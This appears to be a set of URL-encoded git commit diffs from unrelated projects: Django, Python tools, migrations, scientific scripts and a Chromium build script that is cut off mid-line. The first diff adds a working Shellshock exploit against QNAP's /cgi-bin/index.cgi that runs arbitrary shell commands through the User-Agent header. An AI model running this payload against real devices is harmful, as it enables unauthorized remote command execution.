@@ -0,0 +1,486 @@ +#!/usr/bin/python%0Aimport socket%0A%0A%0Aprint %22QNAP exploit!%22%0Ainputstr=%22%22%0Aip=%22x.x.x.x%22 #Change IP Value%0Aport=8080%0A%0Awhile True:%0A%09s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)%0A%09inputstr=raw_input(%22cmd%3E %22)%0A%09s.connect(ip,port))%0A%09s.send(%22GET /cgi-bin/index.cgi HTTP/1.0%5CnHost: %22+ip+%22%5CnUser-Agent: () %7B :;%7D; echo; %22+inputstr+%22%5Cr%5Cn%5Cr%5Cn%22)%0A%09output=%22%22%0A%09while True:%0A%09%09buf=s.recv(4096)%0A%09%09if not buf:%0A%09%09%09break%09%09%0A%09%09output+=buf%0A%09indexHTML= output.find(%22html%22)%0A%09print output%5B0:indexHTML%5D%0A%09s.close()%09%0A
444efa0506034302b605107981b0db4b8d2c37cc
task urls
task/urls.py
task/urls.py
Python
0.999783
@@ -0,0 +1,311 @@ +from django.conf.urls import patterns, include, url%0Afrom task.views import Home, TaskView, TaskDetail%0A%0Aurlpatterns = patterns(%0A '',%0A url(r'%5E$', Home.as_view(), name='home'),%0A url(r'%5Etask/$', TaskView.as_view(), name='task'),%0A url(r'%5Etask/(?P%3Cpk%3E%5Cd+)/$', TaskDetail.as_view(), name='task_detail'),%0A)%0A
63c2c7a696aedb1b08d2478a2b84aec42f4364cf
Add tests for URLConverter
tests/bucket/test_url_converter.py
tests/bucket/test_url_converter.py
Python
0
@@ -0,0 +1,1045 @@ +from mrs.bucket import URLConverter%0A%0Adef test_local_to_global():%0A c = URLConverter('myhost', 42, '/my/path')%0A%0A url = c.local_to_global('/my/path/xyz.txt')%0A assert url == 'http://myhost:42/xyz.txt'%0A%0Adef test_local_to_global_outside_dir():%0A c = URLConverter('myhost', 42, '/my/path')%0A%0A url = c.local_to_global('/other/path/xyz.txt')%0A assert url == '/other/path/xyz.txt'%0A%0Adef test_global_to_local():%0A c = URLConverter('myhost', 42, '/my/path')%0A master = 'server:8080'%0A%0A url = c.global_to_local('http://myhost:42/xyz.txt', master)%0A assert url == '/my/path/xyz.txt'%0A%0Adef test_global_to_local_other():%0A c = URLConverter('myhost', 42, '/my/path')%0A master = 'server:8080'%0A%0A url = c.global_to_local('http://other:443/xyz.txt', master)%0A assert url == 'http://other:443/xyz.txt'%0A%0Adef test_global_to_local_master():%0A c = URLConverter('myhost', 42, '/my/path')%0A master = 'server:8080'%0A%0A url = c.global_to_local('http:///xyz.txt', master)%0A assert url == 'http://server:8080/xyz.txt'%0A%0A# vim: et sw=4 sts=4%0A
88cf8e30da6ab655dfc31b2fd88d26ef649e127d
add sha digest tool
getDigest.py
getDigest.py
Python
0
@@ -0,0 +1,641 @@ +#!/usr/bin/env python%0A# encoding: utf-8%0A%0Aimport sys%0Aimport hashlib%0A%0A%0Adef getDigest(file):%0A # BUF_SIZE is totally arbitrary, change for your app!%0A BUF_SIZE = 65536 # lets read stuff in 64kb chunks!%0A md5 = hashlib.md5()%0A sha1 = hashlib.sha1()%0A with open(file, 'rb') as f:%0A while True:%0A data = f.read(BUF_SIZE)%0A if not data:%0A break%0A md5.update(data)%0A sha1.update(data)%0A print(%22MD5: %7B0%7D%22.format(md5.hexdigest()))%0A print(%22SHA1: %7B0%7D%22.format(sha1.hexdigest()))%0A%0A%0Adef main(argv):%0A getDigest(argv)%0A%0A%0Aif __name__ == '__main__':%0A sys.exit(main(sys.argv%5B1%5D))%0A
e9acbc2e1423084ddd4241e2fbdcc7fcbf02ad6d
add empty migration as data migration
coupons/migrations/0005_auto_20151105_1502.py
coupons/migrations/0005_auto_20151105_1502.py
Python
0.000007
@@ -0,0 +1,249 @@ +# -*- coding: utf-8 -*-%0Afrom __future__ import unicode_literals%0A%0Afrom django.db import migrations, models%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('coupons', '0004_auto_20151105_1456'),%0A %5D%0A%0A operations = %5B%0A %5D%0A
3004dec0e0deadc4df61bafb233cd6b277c9bfef
Add in small utility that creates an index on the MongoDB collection, specifically on the Steam ID number key
util/create_mongodb_index.py
util/create_mongodb_index.py
Python
0
@@ -0,0 +1,1441 @@ +#!/usr/env python3.4%0Aimport sys%0Afrom pymongo import ASCENDING%0Afrom util.mongodb import connect_to_db%0Afrom argparse import (ArgumentParser,%0A ArgumentDefaultsHelpFormatter)%0A%0Adef main(argv=None):%0A parser = ArgumentParser(description='Run incremental learning '%0A 'experiments.',%0A formatter_class=ArgumentDefaultsHelpFormatter,%0A conflict_handler='resolve')%0A parser.add_argument('-dbhost', '--mongodb_host',%0A help='Host that the MongoDB server is running on.',%0A type=str,%0A default='localhost')%0A parser.add_argument('--mongodb_port', '-dbport',%0A help='Port that the MongoDB server is running on.',%0A type=int,%0A default=37017)%0A args = parser.parse_args()%0A%0A # Connect to MongoDB database%0A print('Connecting to MongoDB database at %7B%7D:%7B%7D...'%0A .format(args.mongodb_host,%0A args.mongodb_port),%0A file=sys.stderr)%0A db = connect_to_db(args.mongodb_host,%0A args.mongodb_port)%0A%0A # Create index on 'steam_id_number' so that cursors can be sorted%0A # on that particular key%0A print('Creating index on the %22steam_id_number%22 key...',%0A file=sys.stderr)%0A db.create_index('steam_id_number', ASCENDING)%0A print('Created new index %22steam_id_number_1%22 in reviews '%0A 'collection.',%0A file=sys.stderr)%0A
3da9953aa453281fd55ada75b2ed40fce8d9df6c
Create screen_op.py
screen_op.py
screen_op.py
Python
0.000003
@@ -0,0 +1,3563 @@ +#-------------------------------------------------------------------------------%0A#%0A# Controls shed weather station%0A#%0A# The MIT License (MIT)%0A#%0A# Copyright (c) 2015 William De Freitas%0A# %0A# Permission is hereby granted, free of charge, to any person obtaining a copy%0A# of this software and associated documentation files (the %22Software%22), to deal%0A# in the Software without restriction, including without limitation the rights%0A# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell%0A# copies of the Software, and to permit persons to whom the Software is%0A# furnished to do so, subject to the following conditions:%0A# %0A# The above copyright notice and this permission notice shall be included in all%0A# copies or substantial portions of the Software.%0A# %0A# THE SOFTWARE IS PROVIDED %22AS IS%22, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR%0A# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,%0A# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE%0A# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER%0A# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,%0A# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE%0A# SOFTWARE.%0A#%0A#-------------------------------------------------------------------------------%0A%0A#!usr/bin/env python%0A%0A#===============================================================================%0A# Import modules%0A#===============================================================================%0Aimport os%0Aimport settings as s%0A%0A %0A#===============================================================================%0A# DRAW SCREEN%0A#===============================================================================%0Adef draw_screen(sensors, thingspeak_enable, key, rrd_enable, rrd_set):%0A %0A os.system('clear')%0A %0A display_string = %5B%5D%0A %0A display_string.append('WEATHER STATION')%0A display_string.append('')%0A display_string.append('Next precip. acc. reset at '+ str(s.PRECIP_ACC_RESET_TIME))%0A%0A #Display thingspeak field data set up%0A if thingspeak_enable:%0A display_string.append('')%0A display_string.append('Thingspeak write api key: '+key)%0A display_string.append('')%0A display_string.append('Thingspeak field set up:')%0A display_string.append(' Field%5CtName%5Ct%5CtValue%5CtUnit')%0A display_string.append(' ---------------------------------------')%0A for key, value in sorted(sensors.items(), key=lambda e: e%5B1%5D%5B0%5D):%0A display_string.append(' ' + str(value%5Bs.TS_FIELD%5D) + '%5Ct' + key + %0A '%5Ct' + str(value%5Bs.VALUE%5D) + '%5Ct' + value%5Bs.UNIT%5D)%0A %0A #Display RRDtool set up%0A if rrd_enable:%0A display_string.append('')%0A display_string.append('RRDtool set up:')%0A for i in range(0,len(rrd_set)):%0A display_string += rrd_set%5Bi%5D%0A display_string.append('')%0A%0A #Create table header%0A display_string.append('')%0A header ='Date%5Ct%5CtTime%5Ct%5Ct'%0A header_names = ''%0A for key, value in sorted(sensors.items(), key=lambda e: e%5B1%5D%5B0%5D):%0A header_names = header_names + key +'%5Ct'%0A header = header + header_names + 'TS Send'%0A display_string.append(header)%0A display_string.append('=' * (len(header) + 5 * header.count('%5Ct')))%0A %0A #Find the total number of rows on screen%0A rows, columns = os.popen('stty size', 'r').read().split()%0A %0A #Draw screen%0A print('%5Cn'.join(display_string))%0A %0A #Return number of rows left for data%0A return(int(rows) - len(display_string))%0A%0A
754dc2a5bc26a555576970a494a9de0e5026fae1
Add DTFT demo
dtft.py
dtft.py
Python
0
@@ -0,0 +1,1927 @@ +#!/usr/bin/env python3%0A%22%22%22%0AUsing a typical FFT routine and showing the principle%0Abehind the DTFT computation.%0A%0A%22%22%22%0Aimport numpy as np%0Afrom matplotlib import pyplot%0A%0A##################################################%0A%0A# Efficient practical usage%0Adef fft(values, dt):%0A freqs = np.fft.rfftfreq(len(values), dt)%0A coeffs = np.sqrt(2/len(values)) * np.fft.rfft(values) # scaled for unitarity%0A coeffs%5B0%5D /= np.sqrt(2) # don't %22double count%22 the DC alias%0A return (freqs, coeffs)%0A%0A# Working principle%0Adef dtft(values, dt):%0A times = dt * np.arange(len(values))%0A nyquist = 1/(2*dt)%0A dw = 1/(dt*len(values))%0A freqs = np.arange(0.0, nyquist+dw, dw)%0A # (rad/s)/Hz all w*t products%0A dtft_matrix = np.exp(-1j * (2*np.pi) * np.outer(freqs, times))%0A coeffs = np.sqrt(2/len(values)) * dtft_matrix.dot(values) # scaled for unitarity%0A coeffs%5B0%5D /= np.sqrt(2) # don't %22double count%22 the DC alias%0A return (freqs, coeffs)%0A%0A##################################################%0A%0Adef function(time):%0A w = 20*np.pi%0A value = 0.0%0A for k in range(5):%0A value += (k+1)*np.cos((k*w)*time)%0A return value%0A%0Adt = 0.001%0Atimes = np.arange(0.0, 0.2, dt)%0Avalues = function(times)%0A%0A##################################################%0A%0Afft_freqs, fft_coeffs = fft(values, dt)%0Adtft_freqs, dtft_coeffs = dtft(values, dt)%0A%0Aassert np.allclose(fft_freqs, dtft_freqs)%0Aassert np.allclose(fft_coeffs, dtft_coeffs)%0A%0A##################################################%0A%0A# Demonstrate Parseval's theorem%0Aprint(np.linalg.norm(values))%0Aprint(np.linalg.norm(dtft_coeffs))%0A%0A##################################################%0A%0Afig = pyplot.figure()%0A%0Aax = fig.add_subplot(2, 1, 1)%0Aax.plot(times, values)%0Aax.set_xlabel(%22Time (s)%22, fontsize=16)%0Aax.grid(True)%0A%0Aax = fig.add_subplot(2, 1, 2)%0Aax.scatter(dtft_freqs, np.abs(dtft_coeffs))%0Aax.set_xlabel(%22Freq (Hz)%22, fontsize=16)%0Aax.grid(True)%0A%0Apyplot.show()%0A
f342a3bb330eab74f31f632c81792f93a6e086e8
Add a script to automate the generation of source distributions for Windows and Linux.
create_distributions.py
create_distributions.py
Python
0
@@ -0,0 +1,1616 @@ +%22%22%22Script to automate the creation of Windows and Linux source distributions.%0A%0AThe TOPKAPI_example directory is also copied and the .svn directories stripped%0Ato make a clean distribution. The manual is included in MSWord format for now%0Abecause this is how it's stored in SVN.%0A%0AThis script currently relies on Linux tools and will only work on a Linux%0Asystem for now.%0A%0A%22%22%22%0Aimport os%0Aimport shutil%0A%0Acommand = 'find . -name .svn -type d -print0 %7C xargs -0 rm -rf'%0A%0Adef make_distro(dist_path, ex_path, files):%0A path = os.path.join(dist_path, ex_path)%0A %0A if os.path.isdir(dist_path):%0A for root, dirs, files in os.walk(dist_path, topdown=False):%0A for name in files:%0A os.remove(os.path.join(root, name))%0A for name in dirs:%0A os.rmdir(os.path.join(root, name))%0A %0A shutil.copytree(ex_path, path)%0A curr_dir = os.getcwd()%0A os.chdir(path)%0A os.system(command)%0A os.chdir(curr_dir)%0A %0A for fname in files:%0A shutil.copy(fname, dist_path)%0A %0Aif __name__ == %22__main__%22:%0A # make sure the source distributions are built%0A os.system('python setup.py sdist --formats=gztar,zip')%0A %0A # make Linux distribution%0A dist_path = 'TOPKAPI_linux'%0A ex_path = 'TOPKAPI_Example'%0A linux_files = %5B'dist/TOPKAPI-0.1.tar.gz', 'TOPKAPI_Manual.doc'%5D%0A %0A make_distro(dist_path, ex_path, linux_files)%0A %0A # make Windows distribution%0A dist_path = 'TOPKAPI_windows'%0A ex_path = 'TOPKAPI_Example'%0A windows_files = %5B'dist/TOPKAPI-0.1.zip', 'TOPKAPI_Manual.doc'%5D%0A %0A make_distro(dist_path, ex_path, windows_files)%0A
6fd4aefcc70e28d96d7110a903328f24b6fea5e4
bring back the in RAM version, it uses less RAM, but too much to pass 10M entries I think
zorin/mreport.py
zorin/mreport.py
Python
0
@@ -0,0 +1,2401 @@ +import sys%0Aimport json%0A%0Aclass Site(object):%0A%0A def __init__(self):%0A self.op_events = %7B%7D%0A self.chats = set()%0A self.emails = set()%0A self.operators = set()%0A self.visitors = set()%0A%0A def add_operator_event(self, ts, op, state):%0A self.op_events%5Bop%5D = sorted(set(self.op_events.get(op, %5B%5D) + %5B(ts, state)%5D))%0A self.operators.add(op)%0A %0A def get_state(self, time_stamp):%0A states = %5B%5D%0A for op, events in self.op_events.items():%0A prev_state = False%0A for ts, state in events:%0A if ts %3E time_stamp:%0A break%0A prev_state = state%0A states.append(prev_state)%0A return True if True in states else False%0A%0A def add_chat(self, time_stamp, visitor):%0A if time_stamp in self.chats or time_stamp in self.emails:%0A return%0A state = self.get_state(time_stamp)%0A if state:%0A self.chats.add(time_stamp)%0A else:%0A self.emails.add(time_stamp)%0A self.visitors.add(visitor)%0A%0A def report(self, site_id):%0A print %22%7Bsite_id%7D,messages=%7Bmessages%7D,emails=%7Bemails%7D,operators=%7Boperators%7D,visitors=%7Bvisitors%7D%22.format(%0A site_id=site_id, messages=len(self.chats), emails=len(self.emails), %0A operators=len(self.operators), visitors=len(self.visitors))%0A%0Adef main():%0A fname = sys.argv%5B1%5D%0A%0A iterations = %5B%5D%0A%0A for iter in range(0,15): %0A%0A sites = %7B%7D%0A iterations.append(sites)%0A %0A with open(fname) as f:%0A for line in f.readlines():%0A data = json.loads(line)%0A site_id = data%5B'site_id'%5D%0A site = sites.setdefault(site_id, Site())%0A if data%5B'type'%5D == 'status':%0A status = True if data%5B'data'%5D%5B'status'%5D == 'online' else False%0A site.add_operator_event(int(data%5B'timestamp'%5D), intern(str(data%5B'from'%5D)), status)%0A %0A with open(fname) as f:%0A for line in f.readlines():%0A data = json.loads(line.strip())%0A site_id = data%5B'site_id'%5D%0A site = sites%5Bsite_id%5D%0A if data%5B'type'%5D == 'message':%0A site.add_chat(int(data%5B'timestamp'%5D), intern(str(data%5B'from'%5D)))%0A%0A# for site_id, site in sorted(sites.items(), key=lambda _e: _e%5B0%5D):%0A# site.report(site_id)%0A raw_input(%22Press Enter to continue...%22)%0A%0A print iterations%0A%0Aif __name__ == '__main__':%0A main()%0A%0A
a038d9e204bd54e69d5a84427bc9a56b04583460
Create restart script
dbaas/maintenance/scripts/restart_database.py
dbaas/maintenance/scripts/restart_database.py
Python
0.000001
@@ -0,0 +1,1388 @@ +from datetime import date, timedelta%0A%0Afrom maintenance.models import TaskSchedule%0Afrom logical.models import Database%0A%0A%0Adef register_schedule_task_restart_database(hostnames):%0A today = date.today()%0A try:%0A databases = Database.objects.filter(%0A databaseinfra__instances__hostname__hostname__in=hostnames%0A ).distinct()%0A for database in databases:%0A print(%22Checking database %7B%7D%22.format(database.name))%0A scheudled_tasks = TaskSchedule.objects.filter(%0A status=TaskSchedule.SCHEDULED,%0A database=database,%0A method_path='restart_database'%0A )%0A if scheudled_tasks:%0A print(%22Already scheduled for database %7B%7D!%22.format(%0A database.name)%0A )%0A else:%0A task = TaskSchedule.objects.create(%0A method_path='restart_database',%0A scheduled_for=TaskSchedule.next_maintenance_window(%0A today + timedelta(days=2),%0A database.databaseinfra.maintenance_window,%0A database.databaseinfra.maintenance_day%0A ),%0A database=database%0A )%0A task.send_mail(is_new=True)%0A print(%22Done%22)%0A except Exception as err:%0A print(%22Error: %7B%7D%22.format(err))%0A
93a396fdfc2b4a9f83ffbeb38c6f5a574f61478e
Add initial MeSH update script
scripts/update_mesh.py
scripts/update_mesh.py
Python
0
@@ -0,0 +1,3092 @@ +import os%0Aimport re%0Aimport csv%0Aimport gzip%0Aimport xml.etree.ElementTree as ET%0Afrom urllib.request import urlretrieve%0A%0A%0Adef _get_term_names(record, name):%0A # We then need to look for additional terms related to the%0A # preferred concept to get additional names%0A concepts = record.findall('ConceptList/Concept')%0A all_term_names = %5B%5D%0A for concept in concepts:%0A # We only look at the preferred concept here%0A if concept.attrib%5B'PreferredConceptYN'%5D == 'Y':%0A terms = concept.findall('TermList/Term')%0A for term in terms:%0A term_name = term.find('String').text%0A if term_name != name:%0A all_term_names.append(term_name)%0A return all_term_names%0A%0A%0Adef get_mesh_names(et):%0A names = %7B%7D%0A for record in et.iterfind('DescriptorRecord'):%0A # We first get the ID and the name%0A uid = record.find('DescriptorUI').text%0A tree_numbers = record.findall('TreeNumberList/TreeNumber')%0A # Diseases are in the C subtree%0A if not any(t.text%5B0%5D == 'C' for t in tree_numbers):%0A continue%0A name = record.find('DescriptorName/String').text%0A synonyms = _get_term_names(record, name)%0A names%5Buid%5D = %5Bname%5D + synonyms%0A return names%0A%0A%0Adef entries_from_names(names):%0A entries = %5B%5D%0A for uid, synonyms in names.items():%0A for synonym in synonyms:%0A entries.append((synonym, uid))%0A print('Got a total of %25d entries' %25 len(entries))%0A return entries%0A%0A%0Adef load_mesh_resource_file():%0A url = 'ftp://nlmpubs.nlm.nih.gov/online/mesh/2019/xmlmesh/desc2019.gz'%0A desc_path = os.path.join(here, 'mesh_desc2019.gz')%0A if not os.path.exists(desc_path):%0A print('Download MeSH descriptors from %25s' %25 url)%0A urlretrieve(url, desc_path)%0A print('Done downloading MeSH descriptors')%0A # Process the XML and find descriptor records%0A with gzip.open(desc_path) as desc_file:%0A print('Parsing MeSH descriptors')%0A et = ET.parse(desc_file)%0A return et%0A%0A%0Aif __name__ == '__main__':%0A # Basic positioning%0A here = os.path.dirname(os.path.abspath(__file__))%0A kb_dir = os.path.join(here, os.pardir, 'src', 'main', 'resources', 'org',%0A 'clulab', 'reach', 'kb')%0A resource_fname = os.path.join(kb_dir, 'mesh_disease.tsv')%0A%0A et = load_mesh_resource_file()%0A mesh_names = get_mesh_names(et)%0A%0A # We sort the entries first by the synonym but in a way that special%0A # characters and capitalization are ignored, then sort by ID%0A entries = entries_from_names(mesh_names)%0A entries = sorted(entries, key=(lambda x:%0A (re.sub('%5B%5EA-Za-z0-9%5D', '', x%5B0%5D).lower(),%0A x%5B1%5D)))%0A # Now dump the entries into an updated TSV file%0A with open(resource_fname, 'w') as fh:%0A writer = csv.writer(fh, delimiter='%5Ct')%0A for entry in entries:%0A writer.writerow(entry)%0A%0A with open(resource_fname, 'rb') as f1, %5C%0A gzip.open(resource_fname + '.gz', 'wb') as f2:%0A f2.writelines(f1)%0A
b28feb542a34cec9ae9d21b1efed5676dcab8956
Make ContestParticipation.user not nullable; #428
judge/migrations/0030_remove_contest_profile.py
judge/migrations/0030_remove_contest_profile.py
# -*- coding: utf-8 -*- # Generated by Django 1.9.7 on 2016-07-31 18:13 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion def move_current_contest_to_profile(apps, schema_editor): ContestProfile = apps.get_model('judge', 'ContestProfile') db_alias = schema_editor.connection.alias for cp in ContestProfile.objects.using(db_alias).exclude(current=None).select_related('user'): cp.user.current_contest_id = cp.current_id cp.user.save() def move_current_contest_to_contest_profile(apps, schema_editor): ContestProfile = apps.get_model('judge', 'ContestProfile') Profile = apps.get_model('judge', 'Profile') db_alias = schema_editor.connection.alias for profile in Profile.objects.using(db_alias).exclude(current_contest=None): cp = ContestProfile.objects.get_or_create(user=profile)[0] cp.current_id = profile.current_contest_id cp.save() def contest_participation_to_profile(apps, schema_editor): ContestParticipation = apps.get_model('judge', 'ContestParticipation') db_alias = schema_editor.connection.alias for cp in ContestParticipation.objects.using(db_alias).select_related('profile'): cp.user_id = cp.profile.user_id cp.save() def contest_participation_to_contest_profile(apps, schema_editor): ContestParticipation = apps.get_model('judge', 'ContestParticipation') ContestProfile = apps.get_model('judge', 'ContestProfile') db_alias = schema_editor.connection.alias for cp in ContestParticipation.objects.using(db_alias).select_related('profile'): cp.profile = ContestProfile.objects.get_or_create(user_id=cp.user_id)[0] cp.save() class Migration(migrations.Migration): dependencies = [ ('judge', '0029_problem_translation'), ] operations = [ migrations.AddField( model_name='profile', name='current_contest', field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='judge.ContestParticipation', verbose_name='Current contest'), ), migrations.RunPython(move_current_contest_to_profile, move_current_contest_to_contest_profile), migrations.AddField( model_name='contestparticipation', name='user', field=models.ForeignKey(null=True, db_index=True, on_delete=django.db.models.deletion.CASCADE, related_name='contest_history', to='judge.Profile', verbose_name='user'), preserve_default=False, ), migrations.AlterField( model_name='contestparticipation', name='profile', field=models.ForeignKey(to='judge.ContestProfile', verbose_name='User', related_name='contest_history', null=True, on_delete=django.db.models.deletion.CASCADE), ), migrations.RunPython(contest_participation_to_profile, contest_participation_to_contest_profile), migrations.RemoveField( model_name='contestparticipation', name='profile', ), migrations.DeleteModel(name='contestprofile'), ]
Python
0.000103
@@ -2072,16 +2072,55 @@ ET_NULL, +%0A related @@ -2162,16 +2162,55 @@ pation', +%0A verbose @@ -2557,16 +2557,52 @@ CASCADE, +%0A related @@ -2936,16 +2936,52 @@ istory', +%0A null=Tr @@ -3139,32 +3139,337 @@ ntest_profile),%0A + migrations.AlterField(%0A model_name='contestparticipation',%0A name='user',%0A field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='contest_history',%0A to='judge.Profile', verbose_name='user'),%0A ),%0A migratio
6ea2d5af752e4765be8ef433139f72538fa3a2dd
Check that relationships in SsWang are up-to-date
tests/test_semsim_wang_termwise.py
tests/test_semsim_wang_termwise.py
Python
0
@@ -0,0 +1,1998 @@ +#!/usr/bin/env python3%0A%22%22%22Test S-value for Table 1 in Wang_2007%22%22%22%0A%0A__copyright__ = %22Copyright (C) 2020-present, DV Klopfenstein. All rights reserved.%22%0A__author__ = %22DV Klopfenstein%22%0A%0Afrom os.path import join%0Afrom sys import stdout%0A%0Afrom goatools.base import get_godag%0Afrom goatools.semsim.termwise.wang import SsWang%0Afrom goatools.godag.consts import RELATIONSHIP_SET%0A%0Afrom tests.utils import REPO%0Afrom tests.data.ssWang.tbl1 import GO2SVALUE%0A%0A%0Adef test_semsim_wang(prt=stdout):%0A %22%22%22Wang Semantic Similarity tests%22%22%22%0A fin_godag = join(REPO, 'go-basic.obo')%0A run = Run(fin_godag, prt)%0A run.chk_relationships()%0A%0A%0Aclass Run:%0A %22%22%22Wang Semantic Similarity tests%22%22%22%0A%0A def __init__(self, fin_godag, prt):%0A self.godag = get_godag(fin_godag, optional_attrs=%5B'relationship'%5D, prt=prt)%0A%0A @staticmethod%0A def _chk_svalues_a(dag_a):%0A %22%22%22Check values against Table 1%22%22%22%0A assert len(dag_a.go2svalue) == len(GO2SVALUE)%0A for goid, svalue_act in dag_a.go2svalue.items():%0A svalue_exp = GO2SVALUE%5Bgoid%5D%0A assert abs(svalue_exp - svalue_act) %3C .001, 'MISMATCH EXP(%7B%7D) != ACT(%7B%7D)'.format(%0A svalue_exp, svalue_act)%0A%0A def chk_relationships(self):%0A %22%22%22Check that actual relationships are expected%22%22%22%0A rels_all = set()%0A for goterm in self.godag.values():%0A rels_cur = goterm.relationship.keys()%0A if rels_cur:%0A rels_all.update(rels_cur)%0A assert rels_all == RELATIONSHIP_SET, 'UNEXPECTED RELATIONSHIPS'%0A print('**PASSED: EXPECTED GODag RELATIONSHIPS: %7BR%7D'.format(R=sorted(rels_all)))%0A rels_all.add('is_a')%0A rels_act = set(SsWang.dflt_rel2scf.keys())%0A assert rels_all == rels_act, 'BAD SsWang RELATIONSHIPS: %7BRs%7D'.format(Rs=rels_act)%0A print('**PASSED: EXPECTED SsWang RELATIONSHIPS: %7BR%7D'.format(R=sorted(rels_act)))%0A%0A%0Aif __name__ == '__main__':%0A test_semsim_wang()%0A%0A# Copyright (C) 2020-present DV Klopfenstein. All rights reserved.%0A
43eb87c1297ac9999f027f275bce94b3e8f4894e
add problem
leetcode/14_longest_common_prefix.py
leetcode/14_longest_common_prefix.py
Python
0.044376
@@ -0,0 +1,468 @@ +%22%22%22%0AWrite a function to find the longest common prefix string amongst an array of strings.%0A%0AIf there is no common prefix, return an empty string %22%22.%0A%0AExample 1:%0AInput: %5B%22flower%22,%22flow%22,%22flight%22%5D%0AOutput: %22fl%22%0A%0AExample 2:%0AInput: %5B%22dog%22,%22racecar%22,%22car%22%5D%0AOutput: %22%22%0AExplanation: There is no common prefix among the input strings.%0ANote:%0A%0AAll given inputs are in lowercase letters a-z.%0A%22%22%22%0A%0Aclass Solution:%0A def longestCommonPrefix(self, strs: List%5Bstr%5D) -%3E str:%0A
347f22593a20c5553b9469fad051dbaa34643082
add test_log_likelihood.py
crosscat/tests/test_log_likelihood.py
crosscat/tests/test_log_likelihood.py
Python
0.000003
@@ -0,0 +1,2040 @@ +import argparse%0Afrom functools import partial%0A#%0Aimport pylab%0Apylab.ion()%0Apylab.show()%0A#%0Afrom crosscat.LocalEngine import LocalEngine%0Aimport crosscat.utils.data_utils as du%0Aimport crosscat.utils.timing_test_utils as ttu%0Aimport crosscat.utils.convergence_test_utils as ctu%0A%0A%0Aparser = argparse.ArgumentParser()%0Aparser.add_argument('--gen_seed', default=0, type=int)%0Aparser.add_argument('--num_rows', default=100, type=int)%0Aparser.add_argument('--num_cols', default=4, type=int)%0Aparser.add_argument('--num_clusters', default=5, type=int)%0Aparser.add_argument('--num_views', default=1, type=int)%0Aparser.add_argument('--n_steps', default=10, type=int)%0Aargs = parser.parse_args()%0A#%0Agen_seed = args.gen_seed%0Anum_rows = args.num_rows%0Anum_cols = args.num_cols%0Anum_clusters = args.num_clusters%0Anum_views = args.num_views%0An_steps = args.n_steps%0A#%0An_test = num_rows / 10%0A%0A%0A# generate data%0AT, M_c, M_r, gen_X_L, gen_X_D = ttu.generate_clean_state(gen_seed, num_clusters,%0A num_cols, num_rows, num_views)%0AT_test = ctu.create_test_set(M_c, T, gen_X_L, gen_X_D, n_test, seed_seed=0)%0Aengine = LocalEngine()%0AX_L, X_D = engine.initialize(M_c, M_r, T)%0Agen_mtll = ctu.calc_mean_test_log_likelihood(M_c, T, gen_X_L, gen_X_D, T_test)%0Agen_preplexity = ctu.calc_mean_test_log_likelihood(M_c, T, gen_X_L, gen_X_D, T)%0A%0A%0A# run inference%0Acalc_perplexity = lambda p_State: %5C%0A ctu.calc_mean_test_log_likelihood(M_c, T, p_State.get_X_L(),%0A p_State.get_X_D(), T)%0Acalc_test_log_likelihood = lambda p_State: %5C%0A ctu.calc_mean_test_log_likelihood(M_c, T, p_State.get_X_L(),%0A p_State.get_X_D(), T_test)%0Adiagnostic_func_dict = dict(%0A perplexity=calc_perplexity,%0A test_log_likelihood=calc_test_log_likelihood,%0A )%0AX_L, X_D, diagnostics_dict = engine.analyze(M_c, T, X_L, X_D,%0A do_diagnostics=diagnostic_func_dict, n_steps=n_steps)%0A%0A%0A# plot%0Apylab.plot(diagnostics_dict%5B'test_log_likelihood'%5D, 'g')%0Apylab.plot(diagnostics_dict%5B'perplexity'%5D, 'r')%0Apylab.axhline(gen_mtll, color='k')%0Apylab.axhline(gen_preplexity, color='b')%0A
3acbccb289ff74d063c4809d8fc20235e99ea314
When an assert fails, print the data that failed the assert so the problem can be triaged. BUG=none TEST=none Review URL: http://codereview.chromium.org/285005
webkit/build/rule_binding.py
webkit/build/rule_binding.py
#!/usr/bin/python # Copyright (c) 2009 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. # usage: rule_binding.py INPUT CPPDIR HDIR -- INPUTS -- OPTIONS # # INPUT is an IDL file, such as Whatever.idl. # # CPPDIR is the directory into which V8Whatever.cpp will be placed. HDIR is # the directory into which V8Whatever.h will be placed. # # The first item in INPUTS is the path to generate-bindings.pl. Remaining # items in INPUTS are used to build the Perl module include path. # # OPTIONS are passed as-is to generate-bindings.pl as additional arguments. import errno import os import shlex import shutil import subprocess import sys def SplitArgsIntoSections(args): sections = [] while len(args) > 0: if not '--' in args: # If there is no '--' left, everything remaining is an entire section. dashes = len(args) else: dashes = args.index('--') sections.append(args[:dashes]) # Next time through the loop, look at everything after this '--'. if dashes + 1 == len(args): # If the '--' is at the end of the list, we won't come back through the # loop again. Add an empty section now corresponding to the nothingness # following the final '--'. args = [] sections.append(args) else: args = args[dashes + 1:] return sections def main(args): sections = SplitArgsIntoSections(args[1:]) assert len(sections) == 3 (base, inputs, options) = sections assert len(base) == 3 input = base[0] cppdir = base[1] hdir = base[2] assert len(inputs) > 1 generate_bindings = inputs[0] perl_modules = inputs[1:] include_dirs = [] for perl_module in perl_modules: include_dir = os.path.dirname(perl_module) if not include_dir in include_dirs: include_dirs.append(include_dir) # The defines come in as one flat string. Split it up into distinct arguments. if '--defines' in options: defines_index = options.index('--defines') if defines_index + 1 < len(options): split_options = shlex.split(options[defines_index + 1]) if split_options: options[defines_index + 1] = ' '.join(split_options) # Build up the command. command = ['perl', '-w'] for include_dir in include_dirs: command.extend(['-I', include_dir]) command.append(generate_bindings) command.extend(options) command.extend(['--outputDir', cppdir, input]) # Do it. check_call is new in 2.5, so simulate its behavior with call and # assert. return_code = 